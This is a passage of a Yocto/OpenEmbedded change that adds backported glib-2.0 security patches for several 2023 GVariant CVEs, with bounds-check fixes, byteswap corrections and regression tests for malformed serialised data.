+-  return g_variant_ref_sink (new);
++  g_assert (g_variant_is_trusted (new));
++
++  return g_steal_pointer (&new);
+ }
+ 
+ /**
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 4ce0e4f..3dda08e 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -3834,6 +3834,29 @@ test_gv_byteswap (void)
+   g_free (string);
+ }
+ 
++static void
++test_gv_byteswap_non_normal_non_aligned (void)
++{
++  const guint8 data[] = { 0x02 };
++  GVariant *v = NULL;
++  GVariant *v_byteswapped = NULL;
++
++  g_test_summary ("Test that calling g_variant_byteswap() on a variant which "
++                  "is in non-normal form and doesn’t need byteswapping returns "
++                  "the same variant in normal form.");
++
++  v = g_variant_new_from_data (G_VARIANT_TYPE_BOOLEAN, data, sizeof (data), FALSE, NULL, NULL);
++  g_assert_false (g_variant_is_normal_form (v));
++
++  v_byteswapped = g_variant_byteswap (v);
++  g_assert_true (g_variant_is_normal_form (v_byteswapped));
++
++  g_assert_cmpvariant (v, v_byteswapped);
++
++  g_variant_unref (v);
++  g_variant_unref (v_byteswapped);
++}
++
+ static void
+ test_parser (void)
+ {
+@@ -5570,6 +5593,7 @@ main (int argc, char **argv)
+   g_test_add_func ("/gvariant/builder-memory", test_builder_memory);
+   g_test_add_func ("/gvariant/hashing", test_hashing);
+   g_test_add_func ("/gvariant/byteswap", test_gv_byteswap);
++  g_test_add_func ("/gvariant/byteswap/non-normal-non-aligned", test_gv_byteswap_non_normal_non_aligned);
+   g_test_add_func ("/gvariant/parser", test_parses);
+   g_test_add_func ("/gvariant/parser/integer-bounds", test_parser_integer_bounds);
+   g_test_add_func ("/gvariant/parser/recursion", test_parser_recursion);
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
new file mode 100644
index 0000000000..9167ea624f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
@@ -0,0 +1,255 @@
+From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:39:34 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
+ framing offsets
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c       | 81 +++++++++++++++++++++++++++++++++----------
+ glib/tests/gvariant.c | 57 ++++++++++++++++++++++++++----
+ 2 files changed, 112 insertions(+), 26 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index 4dbd9e8..a80c2c9 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5788,7 +5788,8 @@ g_variant_iter_loop (GVariantIter *iter,
+ 
+ /* Serialised data {{{1 */
+ static GVariant *
+-g_variant_deep_copy (GVariant *value)
++g_variant_deep_copy (GVariant *value,
++                     gboolean  byteswap)
+ {
+   switch (g_variant_classify (value))
+     {
+@@ -5806,7 +5807,7 @@ g_variant_deep_copy (GVariant *value)
+         for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
+           {
+             GVariant *child = g_variant_get_child_value (value, i);
+-            g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
++            g_variant_builder_add_value (&builder, g_variant_deep_copy (child, byteswap));
+             g_variant_unref (child);
+           }
+ 
+@@ -5820,28 +5821,63 @@ g_variant_deep_copy (GVariant *value)
+       return g_variant_new_byte (g_variant_get_byte (value));
+ 
+     case G_VARIANT_CLASS_INT16:
+-      return g_variant_new_int16 (g_variant_get_int16 (value));
++      if (byteswap)
++        return g_variant_new_int16 (GUINT16_SWAP_LE_BE (g_variant_get_int16 (value)));
++      else
++        return g_variant_new_int16 (g_variant_get_int16 (value));
+ 
+     case G_VARIANT_CLASS_UINT16:
+-      return g_variant_new_uint16 (g_variant_get_uint16 (value));
++      if (byteswap)
++        return g_variant_new_uint16 (GUINT16_SWAP_LE_BE (g_variant_get_uint16 (value)));
++      else
++        return g_variant_new_uint16 (g_variant_get_uint16 (value));
+ 
+     case G_VARIANT_CLASS_INT32:
+-      return g_variant_new_int32 (g_variant_get_int32 (value));
++      if (byteswap)
++        return g_variant_new_int32 (GUINT32_SWAP_LE_BE (g_variant_get_int32 (value)));
++      else
++        return g_variant_new_int32 (g_variant_get_int32 (value));
+ 
+     case G_VARIANT_CLASS_UINT32:
+-      return g_variant_new_uint32 (g_variant_get_uint32 (value));
++      if (byteswap)
++        return g_variant_new_uint32 (GUINT32_SWAP_LE_BE (g_variant_get_uint32 (value)));
++      else
++        return g_variant_new_uint32 (g_variant_get_uint32 (value));
+ 
+     case G_VARIANT_CLASS_INT64:
+-      return g_variant_new_int64 (g_variant_get_int64 (value));
++      if (byteswap)
++        return g_variant_new_int64 (GUINT64_SWAP_LE_BE (g_variant_get_int64 (value)));
++      else
++        return g_variant_new_int64 (g_variant_get_int64 (value));
+ 
+     case G_VARIANT_CLASS_UINT64:
+-      return g_variant_new_uint64 (g_variant_get_uint64 (value));
++      if (byteswap)
++        return g_variant_new_uint64 (GUINT64_SWAP_LE_BE (g_variant_get_uint64 (value)));
++      else
++        return g_variant_new_uint64 (g_variant_get_uint64 (value));
+ 
+     case G_VARIANT_CLASS_HANDLE:
+-      return g_variant_new_handle (g_variant_get_handle (value));
++      if (byteswap)
++        return g_variant_new_handle (GUINT32_SWAP_LE_BE (g_variant_get_handle (value)));
++      else
++        return g_variant_new_handle (g_variant_get_handle (value));
+ 
+     case G_VARIANT_CLASS_DOUBLE:
+-      return g_variant_new_double (g_variant_get_double (value));
++      if (byteswap)
++        {
++          /* We have to convert the double to a uint64 here using a union,
++           * because a cast will round it numerically. */
++          union
++            {
++              guint64 u64;
++              gdouble dbl;
++            } u1, u2;
++          u1.dbl = g_variant_get_double (value);
++          u2.u64 = GUINT64_SWAP_LE_BE (u1.u64);
++          return g_variant_new_double (u2.dbl);
++        }
++      else
++        return g_variant_new_double (g_variant_get_double (value));
+ 
+     case G_VARIANT_CLASS_STRING:
+       return g_variant_new_string (g_variant_get_string (value, NULL));
+@@ -5896,7 +5932,7 @@ g_variant_get_normal_form (GVariant *value)
+   if (g_variant_is_normal_form (value))
+     return g_variant_ref (value);
+ 
+-  trusted = g_variant_deep_copy (value);
++  trusted = g_variant_deep_copy (value, FALSE);
+   g_assert (g_variant_is_trusted (trusted));
+ 
+   return g_variant_ref_sink (trusted);
+@@ -5916,6 +5952,11 @@ g_variant_get_normal_form (GVariant *value)
+  * contain multi-byte numeric data.  That include strings, booleans,
+  * bytes and containers containing only these things (recursively).
+  *
++ * While this function can safely handle untrusted, non-normal data, it is
++ * recommended to check whether the input is in normal form beforehand, using
++ * g_variant_is_normal_form(), and to reject non-normal inputs if your
++ * application can be strict about what inputs it rejects.
++ *
+  * The returned value is always in normal form and is marked as trusted.
+  *
+  * Returns: (transfer full): the byteswapped form of @value
+@@ -5933,21 +5974,20 @@ g_variant_byteswap (GVariant *value)
+ 
+   g_variant_type_info_query (type_info, &alignment, NULL);
+ 
+-  if (alignment)
+-    /* (potentially) contains multi-byte numeric data */
++  if (alignment && g_variant_is_normal_form (value))
+     {
++      /* (potentially) contains multi-byte numeric data, but is also already in
++       * normal form so we can use a faster byteswapping codepath on the
++       * serialised data */
+       GVariantSerialised serialised = { 0, };
+-      GVariant *trusted;
+       GBytes *bytes;
+ 
+-      trusted = g_variant_get_normal_form (value);
+-      serialised.type_info = g_variant_get_type_info (trusted);
+-      serialised.size = g_variant_get_size (trusted);
++      serialised.type_info = g_variant_get_type_info (value);
++      serialised.size = g_variant_get_size (value);
+       serialised.data = g_malloc (serialised.size);
+       serialised.ordered_offsets_up_to = G_MAXSIZE;  /* operating on the normal form */
+       serialised.checked_offsets_up_to = G_MAXSIZE;
+-      g_variant_store (trusted, serialised.data);
+-      g_variant_unref (trusted);
++      g_variant_store (value, serialised.data);
+ 
+       g_variant_serialised_byteswap (serialised);
+ 
+@@ -5955,6 +5995,9 @@ g_variant_byteswap (GVariant *value)
+       new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
+       g_bytes_unref (bytes);
+     }
++  else if (alignment)
++    /* (potentially) contains multi-byte numeric data */
++    new = g_variant_ref_sink (g_variant_deep_copy (value, TRUE));
+   else
+     /* contains no multi-byte data */
+     new = g_variant_get_normal_form (value);
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 3dda08e..679dd40 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -2284,24 +2284,67 @@ serialise_tree (TreeInstance       *tree,
+ static void
+ test_byteswap (void)
+ {
+-  GVariantSerialised one = { 0, }, two = { 0, };
++  GVariantSerialised one = { 0, }, two = { 0, }, three = { 0, };
+   TreeInstance *tree;
+-
++  GVariant *one_variant = NULL;
++  GVariant *two_variant = NULL;
++  GVariant *two_byteswapped = NULL;
++  GVariant *three_variant = NULL;
++  GVariant *three_byteswapped = NULL;
++  guint8 *three_data_copy = NULL;
++  gsize three_size_copy = 0;
++
++  /* Write a tree out twice, once normally and once byteswapped. */
+   tree = tree_instance_new (NULL, 3);
+   serialise_tree (tree, &one);
+ 
++  one_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (one.type_info)),
++                                         one.data, one.size, FALSE, NULL, NULL);
++
+   i_am_writing_byteswapped = TRUE;
+   serialise_tree (tree, &two);
++  serialise_tree (tree, &three);
+   i_am_writing_byteswapped = FALSE;
+ 
+-  g_variant_serialised_byteswap (two);
+-
+-  g_assert_cmpmem (one.data, one.size, two.data, two.size);
+-  g_assert_cmpuint (one.depth, ==, two.depth);
+-
++  /* Swap the first byteswapped one back using the function we want to test. */
++  two_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (two.type_info)),
++                                         two.data, two.size, FALSE, NULL, NULL);
++  two_byteswapped = g_variant_byteswap (two_variant);
++
++  /* Make the second byteswapped one non-normal (hopefully), and then byteswap
++   * it back using the function we want to test in its non-normal mode.
++   * This might not work because it’s not necessarily possible to make an
++   * arbitrary random variant non-normal. Adding a single zero byte to the end
++   * often makes something non-normal but still readable. */
++  three_size_copy = three.size + 1;
++  three_data_copy = g_malloc (three_size_copy);
++  memcpy (three_data_copy, three.data, three.size);
++  three_data_copy[three.size] = '\0';
++
++  three_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (three.type_info)),
++                                           three_data_copy, three_size_copy, FALSE, NULL, NULL);
++  three_byteswapped = g_variant_byteswap (three_variant);
++
++  /* Check they’re the same. We can always compare @one_variant and
++   * @two_byteswapped. We can only compare @two_byteswapped and
++   * @three_byteswapped if @two_variant and @three_variant are equal: in that
++   * case, the corruption to @three_variant was enough to make it non-normal but
++   * not enough to change its value. */
++  g_assert_cmpvariant (one_variant, two_byteswapped);
++
++  if (g_variant_equal (two_variant, three_variant))
++    g_assert_cmpvariant (two_byteswapped, three_byteswapped);
++
++  g_variant_unref (three_byteswapped);
++  g_variant_unref (three_variant);
++  g_variant_unref (two_byteswapped);
++  g_variant_unref (two_variant);
++  g_variant_unref (one_variant);
+   tree_instance_free (tree);
+   g_free (one.data);
+   g_free (two.data);
++  g_free (three.data);
++  g_free (three_data_copy);
+ }
+ 
+ static void
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
new file mode 100644
index 0000000000..533142b22a
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
@@ -0,0 +1,49 @@
+From 21a204147b16539b3eda3143b32844c49e29f4d4 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 11:33:49 +0000
+Subject: [PATCH] gvariant: Propagate trust when getting a child of a
+ serialised variant
+
+If a variant is trusted, that means all its children are trusted, so
+ensure that their checked offsets are set as such.
+
+This allows a lot of the offset table checks to be avoided when getting
+children from trusted serialised tuples, which speeds things up.
+
+No unit test is included because this is just a performance fix. If
+there are other slownesses, or regressions, in serialised `GVariant`
+performance, the fuzzing setup will catch them like it did this one.
+
+This change does reduce the time to run the oss-fuzz reproducer from 80s
+to about 0.7s on my machine.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2841
+oss-fuzz#54314
+
+CVE: CVE-2023-32636
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/21a204147b16539b3eda3143b32844c49e29f4d4]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 1b9d5cc..ed57c70 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -1173,8 +1173,8 @@ g_variant_get_child_value (GVariant *value,
+     child->contents.serialised.bytes =
+       g_bytes_ref (value->contents.serialised.bytes);
+     child->contents.serialised.data = s_child.data;
+-    child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
+-    child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
++    child->contents.serialised.ordered_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.ordered_offsets_up_to;
++    child->contents.serialised.checked_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.checked_offsets_up_to;
+ 
+     return child;
+   }
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
new file mode 100644
index 0000000000..9c0867bf5f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
@@ -0,0 +1,154 @@
+From 78da5faccb3e065116b75b3ff87ff55381da6c76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 11:24:43 +0000
+Subject: [PATCH] gvariant: Check offset table doesn't fall outside variant
+ bounds
+
+When dereferencing the first entry in the offset table for a tuple,
+check that it doesn’t fall outside the bounds of the variant first.
+
+This prevents an out-of-bounds read from some non-normal tuples.
+
+This bug was introduced in commit 73d0aa81c2575a5c9ae77d.
+
+Includes a unit test, although the test will likely only catch the
+original bug if run with asan enabled.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2840
+oss-fuzz#54302
+
+CVE: CVE-2023-32643
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/78da5faccb3e065116b75b3ff87ff55381da6c76]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 12 ++++++--
+ glib/tests/gvariant.c      | 63 ++++++++++++++++++++++++++++++++++++++
+ 2 files changed, 72 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 5aa2cbc..4e50ed7 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -979,7 +979,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised  value,
+ 
+   member_info = g_variant_type_info_member_info (value.type_info, index_);
+ 
+-  if (member_info->i + 1)
++  if (member_info->i + 1 &&
++      offset_size * (member_info->i + 1) <= value.size)
+     member_start = gvs_read_unaligned_le (value.data + value.size -
+                                           offset_size * (member_info->i + 1),
+                                           offset_size);
+@@ -990,7 +991,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised  value,
+   member_start &= member_info->b;
+   member_start |= member_info->c;
+ 
+-  if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
++  if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST &&
++      offset_size * (member_info->i + 1) <= value.size)
+     member_end = value.size - offset_size * (member_info->i + 1);
+ 
+   else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
+@@ -1001,11 +1003,15 @@ gvs_tuple_get_member_bounds (GVariantSerialised  value,
+       member_end = member_start + fixed_size;
+     }
+ 
+-  else /* G_VARIANT_MEMBER_ENDING_OFFSET */
++  else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET &&
++           offset_size * (member_info->i + 2) <= value.size)
+     member_end = gvs_read_unaligned_le (value.data + value.size -
+                                         offset_size * (member_info->i + 2),
+                                         offset_size);
+ 
++  else  /* invalid */
++    member_end = G_MAXSIZE;
++
+   if (out_member_start != NULL)
+     *out_member_start = member_start;
+   if (out_member_end != NULL)
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 679dd40..2eca8be 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -5432,6 +5432,67 @@ test_normal_checking_tuple_offsets4 (void)
+   g_variant_unref (variant);
+ }
+ 
++/* This is a regression test that dereferencing the first element in the offset
++ * table doesn’t dereference memory before the start of the GVariant. The first
++ * element in the offset table gives the offset of the final member in the
++ * tuple (the offset table is stored in reverse), and the position of this final
++ * member is needed to check that none of the tuple members overlap with the
++ * offset table
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2840 */
++static void
++test_normal_checking_tuple_offsets5 (void)
++{
++  /* A tuple of type (sss) in normal form would have an offset table with two
++   * entries:
++   *  - The first entry (lowest index in the table) gives the offset of the
++   *    third `s` in the tuple, as the offset table is reversed compared to the
++   *    tuple members.
++   *  - The second entry (highest index in the table) gives the offset of the
++   *    second `s` in the tuple.
++   *  - The offset of the first `s` in the tuple is always 0.
++   *
++   * See §2.5.4 (Structures) of the GVariant specification for details, noting
++   * that the table is only layed out this way because all three members of the
++   * tuple have non-fixed sizes.
++   *
++   * It’s not clear whether the 0xaa data of this variant is part of the strings
++   * in the tuple, or part of the offset table. It doesn’t really matter. This
++   * is a regression test to check that the code to validate the offset table
++   * doesn’t unconditionally try to access the first entry in the offset table
++   * by subtracting the table size from the end of the GVariant data.
++   *
++   * In this non-normal case, that would result in an address off the start of
++   * the GVariant data, and an out-of-bounds read, because the GVariant is one
++   * byte long, but the offset table is calculated as two bytes long (with 1B
++   * sized entries) from the tuple’s type.
++   */
++  const GVariantType *data_type = G_VARIANT_TYPE ("(sss)");
++  const guint8 data[] = { 0xaa };
++  gsize size = sizeof (data);
++  GVariant *variant = NULL;
++  GVariant *normal_variant = NULL;
++  GVariant *expected = NULL;
++
++  g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2840");
++
++  variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++  g_assert_nonnull (variant);
++
++  g_assert_false (g_variant_is_normal_form (variant));
++
++  normal_variant = g_variant_get_normal_form (variant);
++  g_assert_nonnull (normal_variant);
++
++  expected = g_variant_new_parsed ("('', '', '')");
++  g_assert_cmpvariant (expected, variant);
++  g_assert_cmpvariant (expected, normal_variant);
++
++  g_variant_unref (expected);
++  g_variant_unref (normal_variant);
++  g_variant_unref (variant);
++}
++
+ /* Test that an otherwise-valid serialised GVariant is considered non-normal if
+  * its offset table entries are too wide.
+  *
+@@ -5680,6 +5741,8 @@ main (int argc, char **argv)
+                    test_normal_checking_tuple_offsets3);
+   g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
+                    test_normal_checking_tuple_offsets4);
++  g_test_add_func ("/gvariant/normal-checking/tuple-offsets5",
++                   test_normal_checking_tuple_offsets5);
+   g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
+                    test_normal_checking_tuple_offsets_minimal_sized);
+   g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
new file mode 100644
index 0000000000..9fc58341cb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
@@ -0,0 +1,103 @@
+From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:04:49 +0000
+Subject: [PATCH] gvariant-core: Consolidate construction of
+ `GVariantSerialised`
+
+So I only need to change it in one place.
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 49 ++++++++++++++++++++++----------------------
+ 1 file changed, 25 insertions(+), 24 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 9397573..aa0e0a0 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -349,6 +349,27 @@ g_variant_ensure_size (GVariant *value)
+     }
+ }
+ 
++/* < private >
++ * g_variant_to_serialised:
++ * @value: a #GVariant
++ *
++ * Gets a GVariantSerialised for a GVariant in state STATE_SERIALISED.
++ */
++inline static GVariantSerialised
++g_variant_to_serialised (GVariant *value)
++{
++  g_assert (value->state & STATE_SERIALISED);
++  {
++    GVariantSerialised serialised = {
++      value->type_info,
++      (gpointer) value->contents.serialised.data,
++      value->size,
++      value->depth,
++    };
++    return serialised;
++  }
++}
++
+ /* < private >
+  * g_variant_serialise:
+  * @value: a #GVariant
+@@ -991,16 +1012,8 @@ g_variant_n_children (GVariant *value)
+   g_variant_lock (value);
+ 
+   if (value->state & STATE_SERIALISED)
+-    {
+-      GVariantSerialised serialised = {
+-        value->type_info,
+-        (gpointer) value->contents.serialised.data,
+-        value->size,
+-        value->depth,
+-      };
+-
+-      n_children = g_variant_serialised_n_children (serialised);
+-    }
++    n_children = g_variant_serialised_n_children (
++        g_variant_to_serialised (value));
+   else
+     n_children = value->contents.tree.n_children;
+ 
+@@ -1061,12 +1074,7 @@ g_variant_get_child_value (GVariant *value,
+     }
+ 
+   {
+-    GVariantSerialised serialised = {
+-      value->type_info,
+-      (gpointer) value->contents.serialised.data,
+-      value->size,
+-      value->depth,
+-    };
++    GVariantSerialised serialised = g_variant_to_serialised (value);
+     GVariantSerialised s_child;
+     GVariant *child;
+ 
+@@ -1179,14 +1187,7 @@ g_variant_is_normal_form (GVariant *value)
+ 
+   if (value->state & STATE_SERIALISED)
+     {
+-      GVariantSerialised serialised = {
+-        value->type_info,
+-        (gpointer) value->contents.serialised.data,
+-        value->size,
+-        value->depth
+-      };
+-
+-      if (g_variant_serialised_is_normal (serialised))
++      if (g_variant_serialised_is_normal (g_variant_to_serialised (value)))
+         value->state |= STATE_TRUSTED;
+     }
+   else
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
new file mode 100644
index 0000000000..0e96b8d457
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
@@ -0,0 +1,210 @@
+From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:39:34 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
+ framing offsets
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 108 +++++++++++++++++++------------------
+ 1 file changed, 57 insertions(+), 51 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 83e9d85..c7c2114 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -633,30 +633,62 @@ gvs_calculate_total_size (gsize body_size,
+   return body_size + 8 * offsets;
+ }
+ 
++struct Offsets
++{
++  gsize     data_size;
++
++  guchar   *array;
++  gsize     length;
++  guint     offset_size;
++
++  gboolean  is_normal;
++};
++
+ static gsize
+-gvs_variable_sized_array_n_children (GVariantSerialised value)
++gvs_offsets_get_offset_n (struct Offsets *offsets,
++                          gsize           n)
++{
++  return gvs_read_unaligned_le (
++      offsets->array + (offsets->offset_size * n), offsets->offset_size);
++}
++
++static struct Offsets
++gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
+ {
++  struct Offsets out = { 0, };
+   gsize offsets_array_size;
+-  gsize offset_size;
+   gsize last_end;
+ 
+   if (value.size == 0)
+-    return 0;
+-
+-  offset_size = gvs_get_offset_size (value.size);
++    {
++      out.is_normal = TRUE;
++      return out;
++    }
+ 
+-  last_end = gvs_read_unaligned_le (value.data + value.size -
+-                                    offset_size, offset_size);
++  out.offset_size = gvs_get_offset_size (value.size);
++  last_end = gvs_read_unaligned_le (value.data + value.size - out.offset_size,
++                                    out.offset_size);
+ 
+   if (last_end > value.size)
+-    return 0;
++    return out;  /* offsets not normal */
+ 
+   offsets_array_size = value.size - last_end;
+ 
+-  if (offsets_array_size % offset_size)
+-    return 0;
++  if (offsets_array_size % out.offset_size)
++    return out;  /* offsets not normal */
++
++  out.data_size = last_end;
++  out.array = value.data + last_end;
++  out.length = offsets_array_size / out.offset_size;
++  out.is_normal = TRUE;
+ 
+-  return offsets_array_size / offset_size;
++  return out;
++}
++
++static gsize
++gvs_variable_sized_array_n_children (GVariantSerialised value)
++{
++  return gvs_variable_sized_array_get_frame_offsets (value).length;
+ }
+ 
+ static GVariantSerialised
+@@ -664,8 +696,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+                                     gsize              index_)
+ {
+   GVariantSerialised child = { 0, };
+-  gsize offset_size;
+-  gsize last_end;
++
++  struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
++
+   gsize start;
+   gsize end;
+ 
+@@ -673,18 +706,11 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+   g_variant_type_info_ref (child.type_info);
+   child.depth = value.depth + 1;
+ 
+-  offset_size = gvs_get_offset_size (value.size);
+-
+-  last_end = gvs_read_unaligned_le (value.data + value.size -
+-                                    offset_size, offset_size);
+-
+   if (index_ > 0)
+     {
+       guint alignment;
+ 
+-      start = gvs_read_unaligned_le (value.data + last_end +
+-                                     (offset_size * (index_ - 1)),
+-                                     offset_size);
++      start = gvs_offsets_get_offset_n (&offsets, index_ - 1);
+ 
+       g_variant_type_info_query (child.type_info, &alignment, NULL);
+       start += (-start) & alignment;
+@@ -692,11 +718,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+   else
+     start = 0;
+ 
+-  end = gvs_read_unaligned_le (value.data + last_end +
+-                               (offset_size * index_),
+-                               offset_size);
++  end = gvs_offsets_get_offset_n (&offsets, index_);
+ 
+-  if (start < end && end <= value.size && end <= last_end)
++  if (start < end && end <= value.size && end <= offsets.data_size)
+     {
+       child.data = value.data + start;
+       child.size = end - start;
+@@ -768,34 +792,16 @@ static gboolean
+ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ {
+   GVariantSerialised child = { 0, };
+-  gsize offsets_array_size;
+-  guchar *offsets_array;
+-  guint offset_size;
+   guint alignment;
+-  gsize last_end;
+-  gsize length;
+   gsize offset;
+   gsize i;
+ 
+-  if (value.size == 0)
+-    return TRUE;
+-
+-  offset_size = gvs_get_offset_size (value.size);
+-  last_end = gvs_read_unaligned_le (value.data + value.size -
+-                                    offset_size, offset_size);
++  struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
+ 
+-  if (last_end > value.size)
++  if (!offsets.is_normal)
+     return FALSE;
+ 
+-  offsets_array_size = value.size - last_end;
+-
+-  if (offsets_array_size % offset_size)
+-    return FALSE;
+-
+-  offsets_array = value.data + value.size - offsets_array_size;
+-  length = offsets_array_size / offset_size;
+-
+-  if (length == 0)
++  if (value.size != 0 && offsets.length == 0)
+     return FALSE;
+ 
+   child.type_info = g_variant_type_info_element (value.type_info);
+@@ -803,14 +809,14 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+   child.depth = value.depth + 1;
+   offset = 0;
+ 
+-  for (i = 0; i < length; i++)
++  for (i = 0; i < offsets.length; i++)
+     {
+       gsize this_end;
+ 
+-      this_end = gvs_read_unaligned_le (offsets_array + offset_size * i,
+-                                        offset_size);
++      this_end = gvs_read_unaligned_le (offsets.array + offsets.offset_size * i,
++                                        offsets.offset_size);
+ 
+-      if (this_end < offset || this_end > last_end)
++      if (this_end < offset || this_end > offsets.data_size)
+         return FALSE;
+ 
+       while (offset & alignment)
+@@ -832,7 +838,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+       offset = this_end;
+     }
+ 
+-  g_assert (offset == last_end);
++  g_assert (offset == offsets.data_size);
+ 
+   return TRUE;
+ }
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
new file mode 100644
